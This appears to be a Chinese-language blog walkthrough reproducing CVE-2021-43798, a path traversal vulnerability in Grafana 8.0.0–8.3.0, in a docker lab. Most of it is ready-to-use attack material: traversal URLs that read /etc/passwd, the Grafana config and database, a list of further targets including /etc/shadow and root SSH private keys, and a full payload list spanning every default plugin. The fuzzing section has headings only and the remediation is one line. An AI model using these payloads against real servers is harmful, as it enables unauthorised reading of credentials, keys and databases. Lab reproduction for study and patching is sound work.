文章目录

• 🍬 博主介绍
• 一、漏洞编号
• 二、漏洞描述
• 三、影响范围
• 四、环境搭建
• • 1、进入 CVE-2021-43798环境
  • 2、启动 CVE-2021-43798环境
  • 3、查看 CVE-2021-43798环境
  • 4、访问 CVE-2021-43798环境
  • 5、查看 CVE-2021-43798提示信息
  • 6、关闭 CVE-2021-43798环境
• 五、漏洞复现
• • 1、POC（攻击路径）：
  • 2、读取etc/passwd
  • 3、读取Grafana配置文件
  • 4、读取Grafana数据库
  • 5、其他可获取的文件
  • 6、可攻击路径清单
  • 7、Grafana默认安装插件列表
• 六、Bp爆破模块进行fuzz测试
• • 1、准备字典
  • 2、爆破模块设置
  • • 设置爆破点
    • 导入字典
    • 开始爆破
  • 3、爆破成功
  • • 查看请求包
    • 查看返回包
• 七、修复方式

一、漏洞编号

CVE-2021-43798

二、漏洞描述

三、影响范围

Grafana 8.0.0 - 8.3.0

四、环境搭建

1、进入 CVE-2021-43798环境

cd CVE-2021-43798

2、启动 CVE-2021-43798环境

docker-compose up -d

3、查看 CVE-2021-43798环境

docker-compose ps

4、访问 CVE-2021-43798环境

http://192.168.13.131:3000/

5、查看 CVE-2021-43798提示信息

cat README.md 

6、关闭 CVE-2021-43798环境

docker-compose down

五、漏洞复现

1、POC（攻击路径）：

<grafana_host_url>/public/plugins/<“plugin-id”>其中<“plugin-id”>是任何已安装插件的插件ID。

2、读取etc/passwd

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd

3、读取Grafana配置文件

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/grafana/grafana.ini

4、读取Grafana数据库

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db

5、其他可获取的文件

/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/passwd
/etc/shadow
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/net/fib_trie
/proc/net/tcp
/proc/self/cmdline

6、可攻击路径清单

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

7、Grafana默认安装插件列表

alertlist
annolist
grafana-azure-monitor-datasource
barchart
bargauge
cloudwatch
dashlist
elasticsearch
gauge
geomap
gettingstarted
stackdriver
graph
graphite
heatmap
histogram
influxdb
jaeger
logs
loki
mssql
mysql
news
nodeGraph
opentsdb
piechart
pluginlist
postgres
prometheus
stat
state-timeline
status-history
table
table-old
tempo
testdata
text
timeseries
welcome
zipkin

六、Bp爆破模块进行fuzz测试

1、准备字典

2、爆破模块设置

设置爆破点

导入字典

开始爆破

3、爆破成功

查看请求包

查看返回包

七、修复方式

升级至最新版本